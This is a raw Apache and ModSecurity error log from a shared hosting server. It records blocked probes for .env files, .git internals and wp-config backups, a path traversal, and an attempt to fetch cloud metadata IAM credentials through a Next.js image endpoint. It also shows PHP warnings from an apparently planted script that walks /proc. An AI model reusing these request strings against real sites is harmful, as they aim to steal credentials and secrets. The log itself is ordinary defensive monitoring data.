[Tue May 12 04:47:48.322498 2026] [ssl:error] [pid 1730207:tid 1730230] (EAI 2)Name or service not known: [client 74.7.230.0:35792] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:47:48.322558 2026] [ssl:error] [pid 1730207:tid 1730230] AH01941: stapling_renew_response: responder error
[Tue May 12 04:48:07.765016 2026] [security2:error] [pid 1825287:tid 1825328] [client 43.156.228.27:38670] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-json/wp/v2/pieces/593"] [unique_id "agKU5wgpmE1yW0glLdgg9gAAANY"]
PHP Warning:  filesize(): stat failed for /proc/992/task/992/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/992/task/992/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/992/task/992/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/992/task/992/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/992/task/992/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/992/task/992/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:48:44.746175 2026] [authz_core:error] [pid 1820198:tid 1820201] [client 176.120.22.46:65244] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-admin/includes/error_log, referer: https://www.maelbailly.fr/wp-admin/includes/
[Tue May 12 04:48:47.705138 2026] [security2:error] [pid 1808852:tid 1808857] [client 129.226.214.57:56966] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/index.php"] [unique_id "agKVDxfeipD4uoG21Fok1AAAAAI"]
[Tue May 12 04:49:27.792320 2026] [authz_core:error] [pid 1820198:tid 1820222] [client 216.73.216.110:18491] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/inc/entity/error_log
[Tue May 12 04:49:47.607333 2026] [security2:error] [pid 1825287:tid 1825304] [client 43.166.131.228:52132] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKVSwgpmE1yW0glLdghSgAAAMA"]
[Tue May 12 04:50:16.317316 2026] [authz_core:error] [pid 1820198:tid 1820207] [client 17.241.219.94:56450] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/fields/error_log
[Tue May 12 04:50:17.037262 2026] [security2:error] [pid 1730207:tid 1730213] [client 43.134.98.88:42252] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agKVaTue9Sp-pIv_Bb63owAAAUQ"]
[Tue May 12 04:50:17.871950 2026] [security2:error] [pid 1820198:tid 1820204] [client 43.164.196.47:35572] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/cafetiere/feed/"] [unique_id "agKVac1tk6y7yBJLpJosrAAAAIQ"]
[Tue May 12 04:50:34.592871 2026] [security2:error] [pid 1825179:tid 1825216] [client 43.134.104.17:56430] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/2024/05/"] [unique_id "agKVetr1yOh9TvizeziSfAAAAFI"]
[Tue May 12 04:50:40.767758 2026] [security2:error] [pid 1808852:tid 1808857] [client 93.123.109.165:7360] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.development"] [unique_id "agKVgBfeipD4uoG21FolGwAAAAI"]
[Tue May 12 04:50:40.767834 2026] [security2:error] [pid 1730175:tid 1730189] [client 93.123.109.165:7286] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVgHo6NvB9WXx5V-6hhwAAAQw"]
[Tue May 12 04:50:40.767915 2026] [security2:error] [pid 1730175:tid 1730189] [client 93.123.109.165:7286] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVgHo6NvB9WXx5V-6hhwAAAQw"]
[Tue May 12 04:50:40.767976 2026] [security2:error] [pid 1808852:tid 1808857] [client 93.123.109.165:7360] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.development"] [unique_id "agKVgBfeipD4uoG21FolGwAAAAI"]
[Tue May 12 04:50:40.768062 2026] [security2:error] [pid 1730175:tid 1730189] [client 93.123.109.165:7286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVgHo6NvB9WXx5V-6hhwAAAQw"]
[Tue May 12 04:50:40.768266 2026] [security2:error] [pid 1825179:tid 1825207] [client 93.123.109.165:7376] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/index"] [unique_id "agKVgNr1yOh9TvizeziSggAAAEk"]
[Tue May 12 04:50:40.768428 2026] [security2:error] [pid 1825179:tid 1825207] [client 93.123.109.165:7376] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/index"] [unique_id "agKVgNr1yOh9TvizeziSggAAAEk"]
[Tue May 12 04:50:40.768664 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:7476] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVgHo6NvB9WXx5V-6hiAAAAQg"]
[Tue May 12 04:50:40.768732 2026] [security2:error] [pid 1808852:tid 1808860] [client 93.123.109.165:7448] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKVgBfeipD4uoG21FolHAAAAAU"]
[Tue May 12 04:50:40.768783 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:7476] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVgHo6NvB9WXx5V-6hiAAAAQg"]
[Tue May 12 04:50:40.768861 2026] [security2:error] [pid 1808852:tid 1808860] [client 93.123.109.165:7448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKVgBfeipD4uoG21FolHAAAAAU"]
[Tue May 12 04:50:40.768879 2026] [security2:error] [pid 1820198:tid 1820202] [client 93.123.109.165:7418] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKVgM1tk6y7yBJLpJosuAAAAII"]
[Tue May 12 04:50:40.769124 2026] [security2:error] [pid 1820198:tid 1820202] [client 93.123.109.165:7418] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKVgM1tk6y7yBJLpJosuAAAAII"]
[Tue May 12 04:50:40.769984 2026] [security2:error] [pid 1730207:tid 1730221] [client 93.123.109.165:7314] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agKVgDue9Sp-pIv_Bb63sQAAAUw"]
[Tue May 12 04:50:40.770125 2026] [security2:error] [pid 1730207:tid 1730221] [client 93.123.109.165:7314] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agKVgDue9Sp-pIv_Bb63sQAAAUw"]
[Tue May 12 04:50:40.771580 2026] [security2:error] [pid 1730207:tid 1730224] [client 93.123.109.165:7392] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agKVgDue9Sp-pIv_Bb63sgAAAU8"]
[Tue May 12 04:50:40.771702 2026] [security2:error] [pid 1730207:tid 1730224] [client 93.123.109.165:7392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agKVgDue9Sp-pIv_Bb63sgAAAU8"]
[Tue May 12 04:50:40.771783 2026] [security2:error] [pid 1825179:tid 1825211] [client 93.123.109.165:7394] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tct-telecom.fr"] [uri "/_next/image"] [unique_id "agKVgNr1yOh9TvizeziShAAAAE0"]
[Tue May 12 04:50:40.772464 2026] [security2:error] [pid 1825179:tid 1825211] [client 93.123.109.165:7394] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/_next/image"] [unique_id "agKVgNr1yOh9TvizeziShAAAAE0"]
[Tue May 12 04:50:40.772823 2026] [security2:error] [pid 1808852:tid 1808869] [client 93.123.109.165:7356] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/config"] [unique_id "agKVgBfeipD4uoG21FolHgAAAA4"]
[Tue May 12 04:50:40.772955 2026] [security2:error] [pid 1808852:tid 1808869] [client 93.123.109.165:7356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/config"] [unique_id "agKVgBfeipD4uoG21FolHgAAAA4"]
[Tue May 12 04:50:40.790973 2026] [security2:error] [pid 1820198:tid 1820214] [client 93.123.109.165:7324] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKVgM1tk6y7yBJLpJosuwAAAI4"]
[Tue May 12 04:50:40.791161 2026] [security2:error] [pid 1820198:tid 1820214] [client 93.123.109.165:7324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKVgM1tk6y7yBJLpJosuwAAAI4"]
[Tue May 12 04:50:40.795617 2026] [security2:error] [pid 1820198:tid 1820206] [client 93.123.109.165:7416] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKVgM1tk6y7yBJLpJosvAAAAIY"]
[Tue May 12 04:50:40.795803 2026] [security2:error] [pid 1820198:tid 1820206] [client 93.123.109.165:7416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKVgM1tk6y7yBJLpJosvAAAAIY"]
[Tue May 12 04:50:41.417489 2026] [security2:error] [pid 1730175:tid 1730189] [client 93.123.109.165:7286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgHo6NvB9WXx5V-6hhwAAAQw"]
[Tue May 12 04:50:41.428213 2026] [security2:error] [pid 1808852:tid 1808857] [client 93.123.109.165:7360] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgBfeipD4uoG21FolGwAAAAI"]
[Tue May 12 04:50:41.430220 2026] [security2:error] [pid 1808852:tid 1808860] [client 93.123.109.165:7448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgBfeipD4uoG21FolHAAAAAU"]
